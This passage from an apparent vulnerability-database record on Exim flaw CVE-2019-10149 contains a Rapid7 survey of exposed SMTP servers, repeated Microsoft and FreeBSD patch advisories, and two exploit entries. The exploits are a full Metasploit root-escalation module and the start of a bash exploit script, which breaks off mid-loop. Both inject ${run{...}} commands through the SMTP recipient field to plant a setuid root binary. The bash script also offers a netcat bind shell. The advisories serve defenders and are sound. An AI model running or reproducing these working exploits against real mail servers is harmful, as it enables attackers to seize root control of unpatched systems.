The following charts and tables illustrate the distribution of SMTP over port 25, SMTP on port 587 (which is intended for SMTP-to-SMTP relaying of messages), and SMTPS on port 465.\n\n Country | SMTP (25) | SMTP (587) | SMTPS (465) \n---|---|---|--- \nUnited States | 1,467,077 | 1,456,598 | 1,253,805 \nGermany | 637,569 | 373,266 | 375,526 \nJapan | 589,222 | 382,133 | 222,633 \nFrance | 398,390 | 212,937 | 196,177 \nPoland | 306,368 | 289,522 | 284,297 \nSpain | 291,844 | 44,435 | 48,694 \nRussia | 245,814 | 104,709 | 95,972 \nUnited Kingdom | 193,073 | 121,902 | 122,069 \nNetherlands | 189,456 | 129,690 | 115,211 \nCanada | 137,342 | 146,323 | 132,133 \n Provider | SMTP (25) | SMTP (587) | SMTPS (465) \n---|---|---|--- \nOVHcloud | 317,584 | 248,695 | 236,772 \nAmazon | 95,175 | 32,579 | 31,438 \nDigitalOcean | 74,097 | 46,521 | 41,234 \nScaleway | 30,876 | 15,332 | 12,594 \nQuadraNet | 29,282 | 18,200 | 8,667 \nGoogle | 29,030 | 50,422 | 50,561 \nMicrosoft | 14,945 | 5,576 | 2,790 \nRackspace | 8,459 | 2,511 | 1,841 \nAlibaba | 5,729 | 3,863 | 3,826 \nOracle | 1,274 | 509 | 345 \n \nAs far as top-level domains are concerned, we see that the vast majority of SMTP lives in dot-com land\u2014we counted over 100 million MX records in dot-com registrations, with a sharp drop-off in dot-de, dot-net, and dot-org, with about 10 million MX records in each.\n\n### SMTP exposure information\n\nThere are dozens of SMTP servers to choose from, each with their own idiosyncratic methods of configuration, spam filtering, and security. The top SMTP server we're able to fingerprint is Postfix, with over a million and a half installs, followed by Exim, Exchange, and trusty Sendmail. The table below is the complete list of every SMTP server we positively identified\u2014mail administrators will recognize the vestiges of old, little-used mail servers, such as the venerable Lotus Domino and ZMailer. 
If these are your mail servers, think long and hard about why you\u2019re still running these as opposed to simply farming this thankless chore out to a dedicated mail service provider.\n\nSMTP Family | Count \n---|--- \nPostfix | 1,679,222 \nexim | 759,799 \nExchange Server | 182,263 \nSendmail | 180,812 \nMail Server | 84,262 \nIIS | 58,720 \nEcelerity Mail Server | 25,206 \nMDaemon | 14,404 \nConnect | 10,447 \nIMail Server | 5,354 \nPro | 3,462 \nIBM Domino | 3,445 \nTwisted | 1,999 \nUTM | 1,926 \nWinWebMail | 1,879 \nEmail Security | 1,867 \nListManager | 1,785 \nLotus Domino | 1,734 \nDavid | 1,490 \nPowerMTA | 1,239 \nCCProxy | 675 \nMailSite | 305 \nPost.Office | 275 \nVPOP3 | 245 \nZMailer | 205 \nGroupWise | 176 \nCheck Point | 78 \nWinRoute | 43 \nMessaging Server | 40 \nVOPMail | 24 \nIntraStore | 22 \nInternet Mail Server | 18 \nNTMail | 17 \nMercury Mail Transport System | 15 \nFWTK | 9 \nSLMail | 8 \nFTGate | 4 \nInternet Mail Services | 4 \nVM | 3 \nMail-Max | 2 \nAppleShare IP Mail Server | 1 \nMERCUR | 1 \nWebShield | 1 \n\nFinally, let's take a quick look at the Exim mail server. As with most other popular software on the internet, we find all sorts of versions in the wild. Unlike other popular software, Exim versioning moves pretty quickly\u2014the current version of Exim at the time of scanning was v4.93, and it had already incremented to 4.94 by the time of publication. However, the difference in popularity between the latest version (4.93) and the next-to-latest (4.92.x) is in the 100,000 range, and given the intense scrutiny afforded to Exim by national intelligence agencies, this delta can be pretty troubling. 
It\u2019s so troubling that the [American National Security Agency issued an advisory](<https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf>) urging Exim administrators to patch and upgrade as soon as possible to avoid exploitation by the \u201cSandworm team.\u201d Specifically, the vulnerability exploited was CVE-2019-10149, and affects versions 4.87 through 4.91\u2014as of the time of our scans, we found approximately 87,500 such servers exposed to the internet. While this is about a fifth of all Exim servers out there, exposed vulnerabilities in mail servers tend to shoot to the top of any list of \u201cmust patch now\u201d vulns.\n\n### Attacker\u2019s view\n\nGiven the high value attackers tend to assign to SMTP vulnerabilities, it\u2019s no surprise that we see fairly consistent scanning action among threat actors in our SMTP honeypots.\n\n Date | SMTP Port | Count | Percentage | Provider \n---|---|---|---|--- \n2020-02-15 | 25 | 518 | 12.92% | Sprint (Poland) \n2020-02-15 | 25 | 514 | 12.82% | China Telecom \n2020-02-15 | 25 | 409 | 10.20% | Tele Asia Hosting \n2020-02-15 | 465 | 4,337 | 99.18% | DigitalOcean \n2020-02-15 | 587 | 4,568 | 99.65% | DigitalOcean \n2020-02-26 | 25 | 32,495 | 73.97% | Hostwinds \n2020-02-26 | 25 | 6,504 | 14.81% | Sprint (Poland) \n2020-02-26 | 25 | 2,730 | 6.21% | Tamatiya Eood Hosting \n2020-02-26 | 465 | 851 | 69.36% | DigitalOcean \n2020-02-26 | 465 | 344 | 28.04% | Web Hosted Group \n2020-02-26 | 587 | 948 | 94.33% | DigitalOcean \n2020-03-25 | 25 | 4,930 | 41.55% | Microsoft 365 \n2020-03-25 | 25 | 1,481 | 12.48% | Locaweb Hosting \n2020-03-25 | 25 | 509 | 4.29% | Hurricane Electric \n2020-03-25 | 465 | 415 | 95.62% | DigitalOcean \n2020-03-25 | 587 | 408 | 97.14% | DigitalOcean \n2020-05-09 | 25 | 1,180 | 58.13% | Vietnam Telecom \n2020-05-09 | 25 | 195 | 9.61% | Zumy Communications \n2020-05-09 | 25 | 159 | 7.83% | 
China Telecom \n2020-05-09 | 465 | 6,641 | 94.91% | Microsoft 365 \n2020-05-09 | 465 | 326 | 4.66% | DigitalOcean \n2020-05-09 | 587 | 316 | 95.18% | DigitalOcean \n\n### Our advice around SMTP\n\n**IT and IT security teams** should seriously consider converting over to an established email provider such as Microsoft's Office 365 or Google's G Suite. Running your own email remains one of the more truly painful network administration tasks, since outages, patch management, and redundant backups can be tricky even in the best of times, to say nothing of the constant drain of resources in the fight against spam and phishing. Established providers in this space have a proven track record of handling both spam and phishing, as well as achieving remarkable uptimes.\n\n**Cloud providers** should provide rock-solid documentation on how to set up SMTP services for their customers, starting with SSL-wrapped SMTP as a default configuration. This is one case where we wouldn't be opposed to providers such as Microsoft and Google inserting a little adver-docu-tizing pushing customers over to their hosted mail solutions.\n\n**Government cybersecurity agencies** should recognize that everyone is challenged by running merely serviceable email infrastructure, and very few organizations are truly excellent at it at any reasonable scale. 
As far as content-based attacks are concerned, these experts should continue pressing for minimum technical defenses, such as DMARC, and user education in recognizing and avoiding phishing scams.", "cvss3": {}, "published": "2020-10-02T13:58:23", "type": "rapid7blog", "title": "NICER Protocol Deep Dive: Internet Exposure of SMTP", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-10149"], "modified": "2020-10-02T13:58:23", "id": "RAPID7BLOG:F3A304F4033DF3E6F81CCD52475053BD", "href": "https://blog.rapid7.com/2020/10/02/nicer-protocol-deep-dive-internet-exposure-of-smtp/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "msrc": [{"lastseen": "2019-07-09T01:32:56", "description": "This week, MSRC confirmed the presence of an active Linux worm leveraging a critical Remote Code Execution (RCE) vulnerability, CVE-2019-10149, in Linux Exim email servers running Exim version 4.87 to 4.91. Microsoft Azure infrastructure and Services are not affected; only customer\u2019s Linux IaaS instances running a vulnerable version of Exim are affected. 
Azure customers running VMs with Exim 4.92 are not \u2026\n\n[ Prevent the impact of a Linux worm by updating Exim (CVE-2019-10149) Read More \u00bb](<https://msrc-blog.microsoft.com/2019/06/14/prevent-the-impact-of-a-linux-worm-by-updating-exim-cve-2019-10149/>)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-06-14T00:27:32", "type": "msrc", "title": "Prevent the impact of a Linux worm by updating Exim (CVE-2019-10149)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-14T00:27:32", "id": "MSRC:31C9A6AB6048DC2F0939A862156094A7", "href": "https://msrc-blog.microsoft.com/2019/06/14/prevent-the-impact-of-a-linux-worm-by-updating-exim-cve-2019-10149/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-13T15:07:07", "description": "This week, MSRC confirmed the presence of an active Linux worm leveraging a critical Remote Code Execution (RCE) vulnerability, CVE-2019-10149, in Linux Exim email servers running Exim version 4.87 to 4.91. 
Microsoft Azure infrastructure and Services are not affected; only customer\u2019s Linux IaaS instances running a vulnerable version of Exim are affected.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-13T07:00:00", "type": "msrc", "title": "Prevent the impact of a Linux worm by updating Exim (CVE-2019-10149)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-13T07:00:00", "id": "MSRC:143E928D2AB55AAFB38D0E001ACA1ACC", "href": "/blog/2019/06/prevent-the-impact-of-a-linux-worm-by-updating-exim-cve-2019-10149/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-22T16:39:48", "description": "This week, MSRC confirmed the presence of an active Linux worm leveraging a critical Remote Code Execution (RCE) vulnerability, CVE-2019-10149, in Linux Exim email servers running Exim version 4.87 to 4.91. 
Microsoft Azure infrastructure and Services are not affected; only customer\u2019s Linux IaaS instances running a vulnerable version of Exim are affected.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-13T07:00:00", "type": "msrc", "title": "Prevent the impact of a Linux worm by updating Exim (CVE-2019-10149)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-13T07:00:00", "id": "MSRC:C2E579B14FD78ED4E967BE9A12DA2ACA", "href": "https://msrc.microsoft.com/blog/2019/06/prevent-the-impact-of-a-linux-worm-by-updating-exim-cve-2019-10149/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-19T01:21:56", "description": "This week, MSRC confirmed the presence of an active Linux worm leveraging a critical Remote Code Execution (RCE) vulnerability, [CVE-2019-10149](<https://www.exim.org/static/doc/security/CVE-2019-10149.txt>), in Linux Exim email servers running Exim version 4.87 to 4.91. 
Microsoft Azure infrastructure and Services are not affected; only customer\u2019s Linux IaaS instances running a vulnerable version of Exim are affected. Azure customers running VMs with Exim 4.92 are not affected by this vulnerability.\n\nAzure has controls in place, from work we\u2019ve already done to [combat SPAM](<https://blogs.msdn.microsoft.com/mast/2017/11/15/enhanced-azure-security-for-sending-emails-november-2017-update/>), that help limit the spread of this worm, but customers using the vulnerable software would still be susceptible to infection.\n\nCustomers using [Azure virtual machines (VMs)](<https://azure.microsoft.com/services/virtual-machines/>) are responsible for updating the operating systems running on their VMs. As this vulnerability is being actively exploited by worm activity, MSRC urges customers to observe [Azure security best practices and patterns](<https://docs.microsoft.com/en-us/azure/security/security-best-practices-and-patterns>) and to patch or restrict network access to VMs running the affected versions of Exim.\n\nA partial mitigation for affected systems is to filter or block network traffic to them via [Network Security Groups (NSGs)](<https://docs.microsoft.com/en-us/azure/virtual-network/security-overview>). This can keep Internet-based \u2018wormable\u2019 malware or other advanced malware threats that exploit the vulnerability from reaching the affected systems. However, affected systems remain vulnerable to Remote Code Execution (RCE) if the attacker\u2019s IP address is permitted through the Network Security Groups.\n\nIt is for these reasons that we strongly advise that all affected systems \u2013 irrespective of whether NSGs are filtering traffic \u2013 be updated as soon as possible. 
\n\n**Resources:**\n\n[Links to Azure Network Security Group Documentation](<https://docs.microsoft.com/en-us/azure/virtual-network/security-overview>) \n[Links to Update Management Solutions using Azure Automation](<https://docs.microsoft.com/en-us/azure/automation/automation-update-management>) \n[Links to Azure Security Best Practices and Patterns](<https://docs.microsoft.com/en-us/azure/security/security-best-practices-and-patterns>)\n\n_JR Aquino_ \n_Manager, Azure Incident Response_ \n_Microsoft Security Response Center (MSRC)_\n\n* * *\n\n_updated 18 June 2019 to clarify \"Microsoft Azure infrastructure and Services are not affected; only customer\u2019s Linux IaaS instances running a vulnerable version of Exim are affected.\"_", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-06-15T03:48:55", "type": "msrc", "title": "Prevent the impact of a Linux worm by updating Exim (CVE-2019-10149)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-15T03:48:55", "id": "MSRC:388A48CE67D2E58B0FB4372836DA1089", "href": 
"https://blogs.technet.microsoft.com/msrc/2019/06/14/prevent-the-impact-of-a-linux-worm-by-updating-exim-cve-2019-10149/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2023-06-13T16:08:16", "description": "Exim team and Qualys report:\n\nWe received a report of a possible remote exploit. Currently there is no evidence of an active use of this exploit.\n\nA patch exists already, is being tested, and backported to all versions we released since (and including) 4.87.\n\nThe severity depends on your configuration. It depends on how close to the standard configuration your Exim runtime configuration is. The closer the better.\n\nExim 4.92 is not vulnerable.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-05-27T00:00:00", "type": "freebsd", "title": "Exim -- RCE in deliver_message() function", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2019-05-27T00:00:00", "id": "45BEA6B5-8855-11E9-8D41-97657151F8C2", "href": 
"https://vuxml.freebsd.org/freebsd/45bea6b5-8855-11e9-8d41-97657151f8c2.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2019-08-24T22:40:27", "description": "", "cvss3": {}, "published": "2019-08-23T00:00:00", "type": "packetstorm", "title": "Exim 4.91 Local Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-10149"], "modified": "2019-08-23T00:00:00", "id": "PACKETSTORM:154198", "href": "https://packetstormsecurity.com/files/154198/Exim-4.91-Local-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'expect' \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = ExcellentRanking \n \ninclude Msf::Exploit::FileDropper \ninclude Msf::Post::File \ninclude Msf::Post::Linux::Priv \ninclude Msf::Post::Linux::System \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Exim 4.87 - 4.91 Local Privilege Escalation', \n'Description' => %q{ \nThis module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive). \nImproper validation of recipient address in deliver_message() \nfunction in /src/deliver.c may lead to command execution with root privileges \n(CVE-2019-10149). 
\n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Qualys', # Discovery and PoC (@qualys) \n'Dennis Herrmann', # Working exploit (@dhn) \n'Marco Ivaldi', # Working exploit (@0xdea) \n'Guillaume Andr\u00e9' # Metasploit module (@yaumn_) \n], \n'DisclosureDate' => '2019-06-05', \n'Platform' => [ 'linux' ], \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'SessionTypes' => [ 'shell', 'meterpreter' ], \n'Targets' => \n[ \n[ \n'Exim 4.87 - 4.91', \nlower_version: Gem::Version.new('4.87'), \nupper_version: Gem::Version.new('4.91') \n] \n], \n'DefaultOptions' => \n{ \n'PrependSetgid' => true, \n'PrependSetuid' => true \n}, \n'References' => \n[ \n[ 'CVE', '2019-10149' ], \n[ 'EDB', '46996' ], \n[ 'URL', 'https://www.openwall.com/lists/oss-security/2019/06/06/1' ] \n] \n)) \n \nregister_options( \n[ \nOptInt.new('EXIMPORT', [ true, 'The port exim is listening to', 25 ]) \n]) \n \nregister_advanced_options( \n[ \nOptBool.new('ForceExploit', [ false, 'Force exploit even if the current session is root', false ]), \nOptFloat.new('SendExpectTimeout', [ true, 'Timeout per send/expect when communicating with exim', 3.5 ]), \nOptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) \n]) \nend \n \ndef base_dir \ndatastore['WritableDir'].to_s \nend \n \ndef encode_command(cmd) \n'\\x' + cmd.unpack('H2' * cmd.length).join('\\x') \nend \n \ndef open_tcp_connection \nsocket_subsystem = Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket.new(client) \nparams = Rex::Socket::Parameters.new({ \n'PeerHost' => '127.0.0.1', \n'PeerPort' => datastore['EXIMPORT'] \n}) \nbegin \nsocket = socket_subsystem.create_tcp_client_channel(params) \nrescue => e \nvprint_error(\"Couldn't connect to port #{datastore['EXIMPORT']}, \"\\ \n\"are you sure exim is listening on this port? 
(see EXIMPORT)\") \nraise e \nend \nreturn socket_subsystem, socket \nend \n \ndef inject_payload(payload) \nif session.type == 'meterpreter' \nsocket_subsystem, socket = open_tcp_connection \n \ntcp_conversation = { \nnil => /220/, \n'helo localhost' => /250/, \n\"MAIL FROM:<>\" => /250/, \n\"RCPT TO:<${run{#{payload}}}@localhost>\" => /250/, \n'DATA' => /354/, \n'Received:' => nil, \n'.' => /250/ \n} \n \nbegin \ntcp_conversation.each do |line, pattern| \nTimeout.timeout(datastore['SendExpectTimeout']) do \nif line \nif line == 'Received:' \nfor i in (1..31) \nsocket.puts(\"#{line} #{i}\\n\") \nend \nelse \nsocket.puts(\"#{line}\\n\") \nend \nend \nif pattern \nsocket.expect(pattern) \nend \nend \nend \nrescue Rex::ConnectionError => e \nfail_with(Failure::Unreachable, e.message) \nrescue Timeout::Error \nfail_with(Failure::TimeoutExpired, 'SendExpectTimeout maxed out') \nensure \nsocket.puts(\"QUIT\\n\") \nsocket.close \nsocket_subsystem.shutdown \nend \nelse \nunless cmd_exec(\"/bin/bash -c 'exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}' \"\\ \n\"&& echo true\").chomp.to_s == 'true' \nfail_with(Failure::NotFound, \"Port #{datastore['EXIMPORT']} is closed\") \nend \n \nbash_script = %| \n#!/bin/bash \n \nexec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']} \nread -u 3 && echo $REPLY \necho \"helo localhost\" >&3 \nread -u 3 && echo $REPLY \necho \"mail from:<>\" >&3 \nread -u 3 && echo $REPLY \necho 'rcpt to:<${run{#{payload}}}@localhost>' >&3 \nread -u 3 && echo $REPLY \necho \"data\" >&3 \nread -u 3 && echo $REPLY \nfor i in $(seq 1 30); do \necho 'Received: $i' >&3 \ndone \necho \".\" >&3 \nread -u 3 && echo $REPLY \necho \"quit\" >&3 \nread -u 3 && echo $REPLY \n| \n \n@bash_script_path = File.join(base_dir, Rex::Text.rand_text_alpha(10)) \nwrite_file(@bash_script_path, bash_script) \nregister_file_for_cleanup(@bash_script_path) \nchmod(@bash_script_path) \ncmd_exec(\"/bin/bash -c \\\"#{@bash_script_path}\\\"\") \nend \n \nprint_status('Payload sent, 
wait a few seconds...') \nRex.sleep(5) \nend \n \ndef check_for_bash \nunless command_exists?('/bin/bash') \nfail_with(Failure::NotFound, 'bash not found') \nend \nend \n \ndef on_new_session(session) \nsuper \n \nif session.type == 'meterpreter' \nsession.core.use('stdapi') unless session.ext.aliases.include?('stdapi') \nsession.fs.file.rm(@payload_path) \nelse \nsession.shell_command_token(\"rm -f #{@payload_path}\") \nend \nend \n \ndef check \nif session.type == 'meterpreter' \nbegin \nsocket_subsystem, socket = open_tcp_connection \nrescue \nreturn CheckCode::Safe \nend \nres = socket.gets \nsocket.close \nsocket_subsystem.shutdown \nelse \ncheck_for_bash \nres = cmd_exec(\"/bin/bash -c 'exec 3</dev/tcp/localhost/#{datastore['EXIMPORT']} && \"\\ \n\"(read -u 3 && echo $REPLY) || echo false'\") \nif res == 'false' \nvprint_error(\"Couldn't connect to port #{datastore['EXIMPORT']}, \"\\ \n\"are you sure exim is listening on this port? (see EXIMPORT)\") \nreturn CheckCode::Safe \nend \nend \n \nif res =~ /Exim ([0-9\\.]+)/i \nversion = Gem::Version.new($1) \nvprint_status(\"Found exim version: #{version}\") \nif version >= target[:lower_version] && version <= target[:upper_version] \nreturn CheckCode::Appears \nelse \nreturn CheckCode::Safe \nend \nend \n \nCheckCode::Unknown \nend \n \ndef exploit \nif is_root? \nunless datastore['ForceExploit'] \nfail_with(Failure::BadConfig, 'Session already has root privileges. 
Set ForceExploit to override.') \nend \nend \n \nunless writable?(base_dir) \nfail_with(Failure::BadConfig, \"#{base_dir} is not writable\") \nend \n \nif nosuid?(base_dir) \nfail_with(Failure::BadConfig, \"#{base_dir} is mounted nosuid\") \nend \n \nunless datastore['PrependSetuid'] && datastore['PrependSetgid'] \nfail_with(Failure::BadConfig, 'PrependSetuid and PrependSetgid must both be set to true in order ' \\ \n'to get root privileges.') \nend \n \nif session.type == 'shell' \ncheck_for_bash \nend \n \n@payload_path = File.join(base_dir, Rex::Text.rand_text_alpha(10)) \nwrite_file(@payload_path, payload.encoded_exe) \nregister_file_for_cleanup(@payload_path) \ninject_payload(encode_command(\"/bin/sh -c 'chown root #{@payload_path};\"\\ \n\"chmod 4755 #{@payload_path}'\")) \n \nunless setuid?(@payload_path) \nfail_with(Failure::Unknown, \"Couldn't escalate privileges\") \nend \n \ncmd_exec(\"#{@payload_path} & echo \") \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/154198/exim4_deliver_message_priv_esc.rb.txt"}, {"lastseen": "2019-06-18T11:49:32", "description": "", "cvss3": {}, "published": "2019-06-17T00:00:00", "type": "packetstorm", "title": "Exim 4.91 Local Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-17T00:00:00", "id": "PACKETSTORM:153312", "href": "https://packetstormsecurity.com/files/153312/Exim-4.91-Local-Privilege-Escalation.html", "sourceData": "`#!/bin/bash \n \n# \n# raptor_exim_wiz - \"The Return of the WIZard\" LPE exploit \n# Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info> \n# \n# A flaw was found in Exim versions 4.87 to 4.91 (inclusive). \n# Improper validation of recipient address in deliver_message() \n# function in /src/deliver.c may lead to remote command execution. 
\n# (CVE-2019-10149) \n# \n# This is a local privilege escalation exploit for \"The Return \n# of the WIZard\" vulnerability reported by the Qualys Security \n# Advisory team. \n# \n# Credits: \n# Qualys Security Advisory team (kudos for your amazing research!) \n# Dennis 'dhn' Herrmann (/dev/tcp technique) \n# \n# Usage (setuid method): \n# $ id \n# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...] \n# $ ./raptor_exim_wiz -m setuid \n# Preparing setuid shell helper... \n# Delivering setuid payload... \n# [...] \n# Waiting 5 seconds... \n# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned \n# # id \n# uid=0(root) gid=0(root) groups=0(root) \n# \n# Usage (netcat method): \n# $ id \n# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...] \n# $ ./raptor_exim_wiz -m netcat \n# Delivering netcat payload... \n# Waiting 5 seconds... \n# localhost [127.0.0.1] 31337 (?) open \n# id \n# uid=0(root) gid=0(root) groups=0(root) \n# \n# Vulnerable platforms: \n# Exim 4.87 - 4.91 \n# \n# Tested against: \n# Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz] \n# \n \nMETHOD=\"setuid\" # default method \nPAYLOAD_SETUID='${run{\\x2fbin\\x2fsh\\t-c\\t\\x22chown\\troot\\t\\x2ftmp\\x2fpwned\\x3bchmod\\t4755\\t\\x2ftmp\\x2fpwned\\x22}}@localhost' \nPAYLOAD_NETCAT='${run{\\x2fbin\\x2fsh\\t-c\\t\\x22nc\\t-lp\\t31337\\t-e\\t\\x2fbin\\x2fsh\\x22}}@localhost' \n \n# usage instructions \nfunction usage() \n{ \necho \"$0 [-m METHOD]\" \necho \necho \"-m setuid : use the setuid payload (default)\" \necho \"-m netcat : use the netcat payload\" \necho \nexit 1 \n} \n \n# payload delivery \nfunction exploit() \n{ \n# connect to localhost:25 \nexec 3<>/dev/tcp/localhost/25 \n \n# deliver the payload \nread -u 3 && echo $REPLY \necho \"helo localhost\" >&3 \nread -u 3 && echo $REPLY \necho \"mail from:<>\" >&3 \nread -u 3 && echo $REPLY \necho \"rcpt to:<$PAYLOAD>\" >&3 \nread -u 3 && echo $REPLY \necho \"data\" >&3 \nread -u 3 && echo $REPLY \nfor i in {1..31} \ndo 
